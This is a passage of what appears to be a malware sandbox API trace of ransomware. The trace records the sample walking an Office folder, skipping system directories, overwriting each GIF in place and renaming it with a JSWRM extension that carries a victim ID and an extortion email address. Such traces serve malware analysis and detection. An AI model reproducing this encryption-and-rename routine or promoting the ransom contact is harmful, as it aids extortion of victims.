Flags=0x0, Size=0x30) returned 0x22d0d8 [0120.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0120.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0120.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0120.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0120.678] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR50B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir50b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR50B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir50b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0120.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0120.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0120.682] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x117f, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR50F.GIF", cAlternateFileName="")) returned 1 [0120.682] lstrcmpiW (lpString1="ZPDIR50F.GIF", lpString2=".") returned 1 [0120.682] lstrcmpiW (lpString1="ZPDIR50F.GIF", lpString2="..") returned 1 [0120.682] lstrcmpiW (lpString1="ZPDIR50F.GIF", lpString2="...") returned 1 [0120.683] lstrcmpiW (lpString1="ZPDIR50F.GIF", lpString2="windows") returned 1 [0120.683] lstrcmpiW (lpString1="ZPDIR50F.GIF", lpString2="recovery") returned 1 [0120.683] lstrcmpiW (lpString1="ZPDIR50F.GIF", lpString2="perflogs") returned 1 [0120.683] lstrcmpiW (lpString1="ZPDIR50F.GIF", lpString2="documents and settings") returned 1 [0120.683] lstrcmpiW (lpString1="ZPDIR50F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.683] lstrcmpiW (lpString1="ZPDIR50F.GIF", lpString2="system volume information") returned 1 [0120.683] lstrcmpiW (lpString1="ZPDIR50F.GIF", lpString2="msocache") returned 1 [0120.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0120.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR50F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR50F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR50F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0120.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0120.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR50F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR50F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR50F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0120.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0120.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0120.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0120.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR50F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir50f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.684] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4479) returned 1 [0120.684] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1170) returned 0x24e1d8 [0120.684] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1170, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1170, lpOverlapped=0x0) returned 1 [0120.763] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.763] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1170, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1170, lpOverlapped=0x0) returned 1 [0120.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.763] CloseHandle (hObject=0x314) returned 1 [0120.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0120.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0120.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0120.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0120.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0120.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.764] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR50F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir50f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR50F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir50f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0120.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0120.766] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2395, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR51B.GIF", cAlternateFileName="")) returned 1 [0120.767] lstrcmpiW (lpString1="ZPDIR51B.GIF", lpString2=".") returned 1 [0120.767] lstrcmpiW (lpString1="ZPDIR51B.GIF", lpString2="..") returned 1 [0120.767] lstrcmpiW (lpString1="ZPDIR51B.GIF", lpString2="...") returned 1 [0120.767] lstrcmpiW (lpString1="ZPDIR51B.GIF", lpString2="windows") returned 1 [0120.767] lstrcmpiW (lpString1="ZPDIR51B.GIF", lpString2="recovery") returned 1 [0120.767] lstrcmpiW (lpString1="ZPDIR51B.GIF", lpString2="perflogs") returned 1 [0120.767] lstrcmpiW (lpString1="ZPDIR51B.GIF", lpString2="documents and settings") returned 1 [0120.767] lstrcmpiW (lpString1="ZPDIR51B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.767] lstrcmpiW (lpString1="ZPDIR51B.GIF", lpString2="system volume information") returned 1 [0120.767] lstrcmpiW (lpString1="ZPDIR51B.GIF", lpString2="msocache") returned 1 [0120.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0120.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR51B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR51B.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR51B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0120.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0120.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR51B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR51B.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR51B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0120.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0120.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0120.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0120.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR51B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir51b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.768] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9109) returned 1 [0120.768] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2390) returned 0x24e1d8 [0120.768] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2390, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2390, lpOverlapped=0x0) returned 1 [0120.770] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.770] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2390, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2390, lpOverlapped=0x0) returned 1 [0120.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.770] CloseHandle (hObject=0x314) returned 1 [0120.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0120.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0120.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0120.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0120.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0120.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.771] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR51B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir51b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR51B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir51b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0120.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0120.772] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1179, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR51F.GIF", cAlternateFileName="")) returned 1 [0120.772] lstrcmpiW (lpString1="ZPDIR51F.GIF", lpString2=".") returned 1 [0120.772] lstrcmpiW (lpString1="ZPDIR51F.GIF", lpString2="..") returned 1 [0120.772] lstrcmpiW (lpString1="ZPDIR51F.GIF", lpString2="...") returned 1 [0120.772] lstrcmpiW (lpString1="ZPDIR51F.GIF", lpString2="windows") returned 1 [0120.772] lstrcmpiW (lpString1="ZPDIR51F.GIF", lpString2="recovery") returned 1 [0120.772] lstrcmpiW (lpString1="ZPDIR51F.GIF", lpString2="perflogs") returned 1 [0120.772] lstrcmpiW (lpString1="ZPDIR51F.GIF", lpString2="documents and settings") returned 1 [0120.772] lstrcmpiW (lpString1="ZPDIR51F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.772] lstrcmpiW (lpString1="ZPDIR51F.GIF", lpString2="system volume information") returned 1 [0120.772] lstrcmpiW (lpString1="ZPDIR51F.GIF", lpString2="msocache") returned 1 [0120.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0120.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR51F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR51F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR51F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0120.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0120.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR51F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR51F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR51F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0120.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0120.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0120.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR51F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir51f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.773] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4473) returned 1 [0120.773] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1170) returned 0x24e1d8 [0120.773] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1170, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1170, lpOverlapped=0x0) returned 1 [0120.775] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.775] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1170, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1170, lpOverlapped=0x0) returned 1 [0120.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.775] CloseHandle (hObject=0x314) returned 1 [0120.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0120.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0120.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0120.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0120.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.775] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR51F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir51f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR51F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft 